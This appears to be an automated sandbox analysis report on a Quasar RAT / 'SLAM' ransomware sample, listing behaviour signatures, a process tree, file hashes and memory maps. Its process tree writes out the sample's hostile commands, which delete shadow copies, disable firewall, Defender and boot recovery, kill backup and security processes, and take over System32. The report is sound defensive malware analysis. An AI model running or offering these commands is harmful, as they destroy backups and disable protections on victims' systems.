Analysis

  • max time kernel
    151s
  • max time network
    128s
  • platform
    windows7_x64
  • resource
    win7-20230831-en
  • resource tags
    arch:x64, arch:x86, image:win7-20230831-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/10/2023, 05:51

General

  • Target

    vcac.exe

  • Size

    24.2MB

  • MD5

    a4a742b543e52358357924c02b9490c4

  • SHA1

    6a8309fc0b3fc6b0747a2c5f89ef7a29428ba743

  • SHA256

    bfd525cf8e0cb81260ed6a80c666491b41b456f5ad389b62089346acbe90856b

  • SHA512

    fb32df097ff44c7be4549d851c8121e26c5fcd6400e8b1b095c2c38bd71214039f81be358e1e3d886a16fe92e83489ab72dacf99ef62768aca8c5aa5698010b4

  • SSDEEP

    98304:GKBbBWIgWljGxRB/LL6vc22SsaNYfdPBldt6+dBcjHVCU688cIyGOk3ta:L4xRBjgB7j4U6gl

Malware Config

Extracted

Family

quasar

Attributes
  • reconnect_delay

    1

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Disables Task Manager via registry modification
  • Drops file in Drivers directory 1 IoCs
  • Modifies Windows Firewall 1 TTPs 5 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Drops startup file 2 IoCs
  • Executes dropped EXE 3 IoCs
  • Loads dropped DLL 10 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Drops desktop.ini file(s) 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 1 IoCs
  • Sets desktop wallpaper using registry 2 TTPs 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Interacts with shadow copies 2 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Kills process with taskkill 42 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\vcac.exe
    "C:\Users\Admin\AppData\Local\Temp\vcac.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops startup file
    • Loads dropped DLL
    • Drops desktop.ini file(s)
    • Sets desktop wallpaper using registry
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Roaming\settings.bat
      2⤵
        PID:2644
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /k cd %appdata% & lm.exe & exit
        2⤵
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:2684
        • C:\Users\Admin\AppData\Roaming\lm.exe
          lm.exe
          3⤵
          • Executes dropped EXE
          • Loads dropped DLL
          • Writes to the Master Boot Record (MBR)
          PID:2932
      • C:\Users\Admin\AppData\Roaming\mbr.exe
        "C:\Users\Admin\AppData\Roaming\mbr.exe"
        2⤵
        • Executes dropped EXE
        • Adds Run key to start application
        • Writes to the Master Boot Record (MBR)
        • Suspicious use of WriteProcessMemory
        PID:2788
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks.exe /Create /TN "Windows Update" /ru SYSTEM /SC ONSTART /TR "C:\Users\Admin\AppData\Roaming\mbr.exe"
          3⤵
          • Creates scheduled task(s)
          PID:1280
      • C:\Users\Admin\AppData\Roaming\svchost.exe
        "C:\Users\Admin\AppData\Roaming\svchost.exe"
        2⤵
        • Executes dropped EXE
        • Drops file in System32 directory
        • Suspicious use of WriteProcessMemory
        PID:2660
        • C:\Windows\System32\cmd.exe
          "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant "%username%:F"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1988
          • C:\Windows\system32\takeown.exe
            takeown /f C:\Windows\System32
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            • Suspicious use of AdjustPrivilegeToken
            PID:2800
          • C:\Windows\system32\icacls.exe
            icacls C:\Windows\System32 /grant "Admin:F"
            4⤵
            • Possible privilege escalation attempt
            • Modifies file permissions
            PID:744
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c taskkill /F /IM BackupExecAgentBrowser* & taskkill /F /IM BackupExecDiveciMediaService* & taskkill /F /IM BackupExecJobEngine* & taskkill /F /IM BackupExecManagementService* & taskkill /F /IM vss* & taskkill /F /IM sql* & taskkill /F /IM svc$* & taskkill /F /IM memtas* & taskkill /F /IM sophos* & taskkill /F /IM veeam* & taskkill /F /IM backup* & taskkill /F /IM GxVss* & taskkill /F /IM GxBlr* & taskkill /F /IM GxFWD* & taskkill /F /IM GxCVD* & taskkill /F /IM GxCIMgr* & taskkill /F /IM DefWatch* & taskkill /F /IM ccEvtMgr* & taskkill /F /IM SavRoam* & taskkill /F /IM RTVscan* & taskkill /F /IM QBFCService* & taskkill /F /IM Intuit.QuickBooks.FCS* & taskkill /F /IM YooBackup* & taskkill /F /IM YooIT* & taskkill /F /IM zhudongfangyu* & taskkill /F /IM sophos* & taskkill /F /IM stc_raw_agent* & taskkill /F /IM VSNAPVSS* & taskkill /F /IM QBCFMonitorService* & taskkill /F /IM VeeamTransportSvc* & taskkill /F /IM VeeamDeploymentService* & taskkill /F /IM VeeamNFSSvc* & taskkill /F /IM veeam* & taskkill /F /IM PDVFSService* & taskkill /F /IM BackupExecVSSProvider* & taskkill /F /IM BackupExecAgentAccelerator* & taskkill /F /IM BackupExecRPCService* & taskkill /F /IM AcrSch2Svc* & taskkill /F /IM AcronisAgent* & taskkill /F /IM CASAD2DWebSvc* & taskkill /F /IM CAARCUpdateSvc* & taskkill /F /IM TeamViewer*
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2848
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentBrowser*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:524
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecDiveciMediaService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecJobEngine*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2136
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecManagementService*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1752
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM vss*
          3⤵
          • Kills process with taskkill
          PID:2072
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sql*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1300
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM svc$*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1532
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM memtas*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1768
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1816
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2156
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM backup*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:3048
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxVss*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2112
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxBlr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1720
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxFWD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1520
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCVD*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2984
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM GxCIMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1704
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM DefWatch*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1712
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM ccEvtMgr*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1972
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM SavRoam*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1636
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM RTVscan*
          3⤵
          • Kills process with taskkill
          PID:2944
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBFCService*
          3⤵
          • Kills process with taskkill
          PID:2496
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM Intuit.QuickBooks.FCS*
          3⤵
          • Kills process with taskkill
          PID:2932
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooBackup*
          3⤵
          • Kills process with taskkill
          PID:2708
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM YooIT*
          3⤵
          • Kills process with taskkill
          PID:2516
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM zhudongfangyu*
          3⤵
          • Kills process with taskkill
          PID:1280
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM sophos*
          3⤵
          • Kills process with taskkill
          PID:2300
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM stc_raw_agent*
          3⤵
          • Kills process with taskkill
          PID:2904
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VSNAPVSS*
          3⤵
          • Kills process with taskkill
          PID:2584
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM QBCFMonitorService*
          3⤵
          • Kills process with taskkill
          PID:2200
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamTransportSvc*
          3⤵
          • Kills process with taskkill
          PID:2588
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamDeploymentService*
          3⤵
          • Kills process with taskkill
          PID:1632
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM VeeamNFSSvc*
          3⤵
          • Kills process with taskkill
          PID:2740
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM veeam*
          3⤵
          • Kills process with taskkill
          PID:2312
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM PDVFSService*
          3⤵
          • Kills process with taskkill
          PID:1328
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecVSSProvider*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2804
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecAgentAccelerator*
          3⤵
          • Kills process with taskkill
          PID:844
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM BackupExecRPCService*
          3⤵
          • Kills process with taskkill
          PID:2948
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcrSch2Svc*
          3⤵
          • Kills process with taskkill
          PID:1820
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM AcronisAgent*
          3⤵
          • Kills process with taskkill
          PID:872
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CASAD2DWebSvc*
          3⤵
          • Kills process with taskkill
          PID:1952
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM CAARCUpdateSvc*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2792
        • C:\Windows\SysWOW64\taskkill.exe
          taskkill /F /IM TeamViewer*
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:2072
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c netsh advfirewall set allprofiles state off & netsh advfirewall set currentprofile state off & netsh advfirewall set domainprofile state off & netsh advfirewall set privateprofile state off & netsh advfirewall set publicprofile state off & REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f & REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f & powershell -Command Add-MpPreference -ExclusionExtension .exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2872
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set allprofiles state off
          3⤵
          • Modifies Windows Firewall
          PID:1624
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set currentprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:548
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set domainprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1136
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set privateprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:968
        • C:\Windows\SysWOW64\netsh.exe
          netsh advfirewall set publicprofile state off
          3⤵
          • Modifies Windows Firewall
          PID:1652
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender /v "DisableAntiSpyware" /t REG_DWORD /d 1 /f
          3⤵
          PID:2936
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
          3⤵
          • Modifies registry key
          PID:2192
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 2 /f
          3⤵
          • Modifies registry key
          PID:1244
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionExtension .exe
          3⤵
          • Suspicious behavior: EnumeratesProcesses
          PID:2440
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c vssadmin delete shadows /all /quiet & wmic shadowcopy delete & bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no & wbadmin delete catalog -quiet
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:2900
        • C:\Windows\SysWOW64\vssadmin.exe
          vssadmin delete shadows /all /quiet
          3⤵
          • Interacts with shadow copies
          PID:2740
        • C:\Windows\SysWOW64\Wbem\WMIC.exe
          wmic shadowcopy delete
          3⤵
          PID:2804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:2792

Network

MITRE ATT&CK Enterprise v15

Downloads

          • C:\Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

          • C:\Users\Admin\AppData\Roaming\VCRUNTIME140D.dll

            Filesize

            111KB

            MD5

            b59b0f6193bcc7e78a3b2fc730196be3

            SHA1

            045469fec2df2a9c75b550984a0ed32db2e9f846

            SHA256

            003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

            SHA512

            73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

          • C:\Users\Admin\AppData\Roaming\boot.bin

            Filesize

            512B

            MD5

            21bbc91fb1bc04deecca398cc526b989

            SHA1

            9579ac63a28ff2e037e69f0812cbfa42532e90f6

            SHA256

            389b11feaf1aa87d1ddd9dfe5d368bc226c1da774ad5ec422b9997b29d359b48

            SHA512

            747cacb3558de0104bc0d98f2cb9b64cb495ce07bf4e55257f8073835f2c43e467ab52b676a61d889c3f8079cb20d5552d6c349da6fa6103d18da7166054abb4

          • C:\Users\Admin\AppData\Roaming\lm.exe

            Filesize

            39KB

            MD5

            86e3192ad129a388e4f0ac864e84df78

            SHA1

            70a2b1422b583c2d768a6f816905bc85687ced52

            SHA256

            4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

            SHA512

            f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

          • C:\Users\Admin\AppData\Roaming\mbr.exe

            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          • C:\Users\Admin\AppData\Roaming\settings.bat

            Filesize

            67B

            MD5

            a204d9e5059a5449af7af765d371d6ea

            SHA1

            cfc6f78545bdc6a1c82491500f1bacfb38bef28c

            SHA256

            d39e88bebdb89ec08c55d320622784e0e131b7c75bd810305daa313c2baa3d26

            SHA512

            d46f0f2282f98116b6e365dc65538a77a39495b7bdd8c910a98226d30bac79026e7c9d6402ed81023a31b7ff8cea316362d8fa909e9edd50b9c6e711d39ddc92

          • C:\Users\Admin\AppData\Roaming\svchost.exe

            Filesize

            41KB

            MD5

            84177654d8bbd32fe8132265e7a598ec

            SHA1

            73bbb239d1449b3af2d7f53614ba456c1add4c9a

            SHA256

            af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

            SHA512

            6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

          • C:\Users\Admin\AppData\Roaming\ucrtbased.dll

            Filesize

            1.4MB

            MD5

            ceeda0b23cdf173bf54f7841c8828b43

            SHA1

            1742f10b0c1d1281e5dec67a9f6659c8816738ad

            SHA256

            c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

            SHA512

            f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

          • C:\Users\Admin\Music\README_SLAM_RANSOMWARE.txt

            Filesize

            2KB

            MD5

            602202efdf521b01bf505a04a08a98f5

            SHA1

            e20b3e5f139c4ae4836f4e3e9caa7dc766a62df7

            SHA256

            1c2c8d7c5dcfd818b2a55fb2f6e99d7f985bd45f2e33463464c98b210d485940

            SHA512

            95cb7e71e68eb227bf04cf50d1c409979e37371e322ac03f3d6535d7fdd095eea294075ada29723c9e231047660794ff374c8ea63489af3f2ba54eba75d11b2c

          • \Users\Admin\AppData\Local\Temp\Newtonsoft.Json.dll

            Filesize

            685KB

            MD5

            081d9558bbb7adce142da153b2d5577a

            SHA1

            7d0ad03fbda1c24f883116b940717e596073ae96

            SHA256

            b624949df8b0e3a6153fdfb730a7c6f4990b6592ee0d922e1788433d276610f3

            SHA512

            2fdf035661f349206f58ea1feed8805b7f9517a21f9c113e7301c69de160f184c774350a12a710046e3ff6baa37345d319b6f47fd24fbba4e042d54014bee511

          • \Users\Admin\AppData\Roaming\lm.exe

            Filesize

            39KB

            MD5

            86e3192ad129a388e4f0ac864e84df78

            SHA1

            70a2b1422b583c2d768a6f816905bc85687ced52

            SHA256

            4f2e651cb369aba3027c03e3d9aa2237af80ca6d03982d9c03a34cd1410c87d3

            SHA512

            f57b6edf4a0ab9bdb5989f82383b7fb236bba6931273f436cb622fdd91bf439b238ca5b5a72a9be3a13b564bc8199601c5d8e470d9766c0b6136df9c6c33d05b

          • \Users\Admin\AppData\Roaming\mbr.exe

            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          • \Users\Admin\AppData\Roaming\mbr.exe

            Filesize

            101KB

            MD5

            00e306f18b8cc56f347f34a7ebaf7f9f

            SHA1

            2bd080cc517e906942f3f7fcb4b88ec1653ef5bc

            SHA256

            ce58d6b982fdab53ac494a6746815a858d9c321df0f4696497176cbda093df9e

            SHA512

            2204afb1a3c3577df6f83b5600a5b0e278ea8fa88226477500169c843d1480ed6d17d6771382808213d98c475534f02c3845850b0465c175efae27ab1232940d

          • \Users\Admin\AppData\Roaming\svchost.exe

            Filesize

            41KB

            MD5

            84177654d8bbd32fe8132265e7a598ec

            SHA1

            73bbb239d1449b3af2d7f53614ba456c1add4c9a

            SHA256

            af531102bbb3238299b1f08916b67604984c370b7da902ef607a1c53dcbe3b73

            SHA512

            6d685bed743185098cf09cce535cd529e9b2a682b939dc1cc24ca85accb061e8ce4d479ebc91634c3ab12d42f77e2288ed75af572ff5fe701a4f2c0a61fb1048

          • \Users\Admin\AppData\Roaming\ucrtbased.dll

            Filesize

            1.4MB

            MD5

            ceeda0b23cdf173bf54f7841c8828b43

            SHA1

            1742f10b0c1d1281e5dec67a9f6659c8816738ad

            SHA256

            c297d2bd5c6fcef4c5895cb5c2d191303f87f4c32ad39a9d236c4831d2a809e9

            SHA512

            f6be09560d84da788391741be48c9759935b71d1c556a596a43b9e39aeb605d827d334f42c83a6120d398cdc4c445767e7bd6efa7baea8c872f29db8da7beb89

          • \Users\Admin\AppData\Roaming\vcruntime140d.dll

            Filesize

            111KB

            MD5

            b59b0f6193bcc7e78a3b2fc730196be3

            SHA1

            045469fec2df2a9c75b550984a0ed32db2e9f846

            SHA256

            003619245b3159385f85757f39947a568d0b386786f81a5a00e71249631e246b

            SHA512

            73cc58cb5f87f2a03a99c461df63740ade5cd97d7c3cd09fd570296627eee5ecfb4a945422cc76f9249281c2ef2d04ee717c2530089b79e3dc0db018b8608a97

          • memory/2364-3-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

          • memory/2364-432-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

          • memory/2364-1-0x00000000012A0000-0x0000000002ADC000-memory.dmp

            Filesize

            24.2MB

          • memory/2364-0-0x00000000748B0000-0x0000000074F9E000-memory.dmp

            Filesize

            6.9MB

          • memory/2364-2-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

          • memory/2364-106-0x00000000748B0000-0x0000000074F9E000-memory.dmp

            Filesize

            6.9MB

          • memory/2364-434-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

          • memory/2364-188-0x0000000001230000-0x0000000001270000-memory.dmp

            Filesize

            256KB

          • memory/2364-414-0x0000000009E20000-0x0000000009ED0000-memory.dmp

            Filesize

            704KB

          • memory/2440-431-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-427-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-433-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

          • memory/2440-428-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

          • memory/2440-424-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-429-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-430-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-426-0x0000000002410000-0x0000000002450000-memory.dmp

            Filesize

            256KB

          • memory/2440-425-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

          • memory/2440-423-0x000000006D740000-0x000000006DCEB000-memory.dmp

            Filesize

            5.7MB

          • memory/2660-62-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

            Filesize

            9.9MB

          • memory/2660-422-0x000000001B190000-0x000000001B210000-memory.dmp

            Filesize

            512KB

          • memory/2660-419-0x000000001B190000-0x000000001B210000-memory.dmp

            Filesize

            512KB

          • memory/2660-392-0x000007FEF59E0000-0x000007FEF63CC000-memory.dmp

            Filesize

            9.9MB

          • memory/2660-125-0x000000001B190000-0x000000001B210000-memory.dmp

            Filesize

            512KB

          • memory/2660-69-0x000000001B190000-0x000000001B210000-memory.dmp

            Filesize

            512KB

          • memory/2660-39-0x0000000000A30000-0x0000000000A40000-memory.dmp

            Filesize

            64KB

          • memory/2684-14-0x0000000000130000-0x0000000000150000-memory.dmp

            Filesize

            128KB

          • memory/2788-38-0x0000000000400000-0x0000000000423000-memory.dmp

            Filesize

            140KB

          • memory/2932-23-0x0000000000C40000-0x0000000000C60000-memory.dmp

            Filesize

            128KB

          • memory/2932-16-0x0000000000C40000-0x0000000000C60000-memory.dmp

            Filesize

            128KB